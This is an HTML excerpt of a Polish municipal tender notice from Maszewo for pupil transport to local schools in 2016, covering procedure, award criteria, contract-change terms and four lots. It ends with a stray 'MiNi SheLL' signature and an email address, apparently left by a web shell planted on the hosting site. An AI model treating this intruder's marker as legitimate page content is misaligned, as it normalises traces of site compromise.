<p>1 Jeżeli Wykonawca przy realizacji przedmiotu zamówienia będzie polegał na wiedzy i doświadczeniu, potencjale  technicznym, osobach zdolnych do wykonywania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, musi on udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne  zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (wzór wg Załącznika nr 11 do SIWZ lub inny dokument, z którego takie zobowiązanie wynika np. umowa, itp.) oraz odpowiednie dokumenty określone w pkt  III.4.1.  Wykaz , o którym mowa w pkt. III.4.1  musi   być podpisany przez Wykonawcę. 
2    Podmiot, który zobowiązał się do udostępnienia Wykonawcy zasobów, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy. 
3  Pisemne zobowiązanie, o którym mowa w pkt 1 musi być podpisane przez osobę / osoby uprawnioną/e do  reprezentowania podmiotu użyczającego zasoby. Do oferty należy załączyć dokument, z którego takie  upoważnienie będzie wynikało. 
4  Jeżeli Wykonawca, wykazując spełnianie warunku wiedzy i doświadczenia,  polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, podmioty te traktowane są jako podmioty, które będą brały udział w realizacji zamówienia.   Zobowiązanie   powinno  zawierać  wyraźne nawiązanie  do uczestnictwa  tego podmiotu w wykonaniu zamówienia. Powyższe uczestnictwo, w dowolnej, dozwolonej przez prawo postaci (np. podwykonawca , czy  innej  podstawie), musi  jednak zostać wykazane przez Wykonawcę w ofercie</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Termin płatności faktury - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności. 
2. Zamawiający przewiduje możliwość zmiany umowy w następujących przypadkach: 
1) nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia; 
2) wynikną rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony; 
3) przedłużenia lub skrócenia terminu wykonania przedmiotu umowy w przypadku: 
działalności siły wyższej( np. klęski żywiołowe, strajki) mającej bezpośredni wpływ na terminowe zakończenie realizacji zadania, 
4)  zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron, 
5) realizacji dodatkowych zadań które mogą być podyktowane sytuacjami, które były niemożliwe do przewidzenia, mogą prowadzić do zmian zawartej umowy i mogą wynikać w szczególności z sytuacji: zmiany miejsca zamieszkania uczniów, działaniem nieprzewidywalnych zjawisk przyrodniczych, usprawnieniem procesu dowozu uczniów, nieprzewidzianej konieczności zmiany zakresu zamówienia, z rezygnacji przez Zamawiającego z realizacji części przedmiotu umowy lub gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca niemożliwością wykonania lub należytego wykonania umowy zgodnie z SIWZ. 
3. Zamawiający nie wyrazi zgody na wprowadzenie zmian jeżeli zmiana może wpłynąć na opóźnienie lub zwiększenie kosztów w wykonaniu umowy zawartej w efekcie przeprowadzenia niniejszego postępowania lub obniżenie jakości wykonania tej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.maszewo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Miejski  w Maszewie,  ul. Leśna 9, 72-130 Maszewo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.12.2015 godzina 11:00, miejsce: Urząd  Miejski  w Maszewie,  ul. Leśna 9, 72-130 Maszewo , Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przewóz uczniów do Szkoły Podstawowej w Rożnowie Nowogardzkim, do Gimnazjum w Maszewie  i Szkoły Podstawowej w Maszewie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres jak opisano w pkt II.1.4)  ogłoszenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin płatności faktury - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przewozy dzieci do Gimnazjum w Maszewie, Szkoły Podstawowej w Maszewie i Przedszkola Miejskiego w Maszewie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres jak opisano  w pkt II.1.4) ogłoszenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin płatności faktury - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przewozy dzieci do Gimnazjum w Maszewie i Szkoły Podstawowej w Dębicach oraz Szkoły Podstawowej w Maszewie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres jak opisnao w pkt II.1.4) ogłoszenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin płatności faktury - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przewozy dzieci niepełnosprawnych do szkół i placówek w Goleniowie i Przybiernowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres jak opisano w pkt II.1.4) ogłoszenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin płatności faktury - 2</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com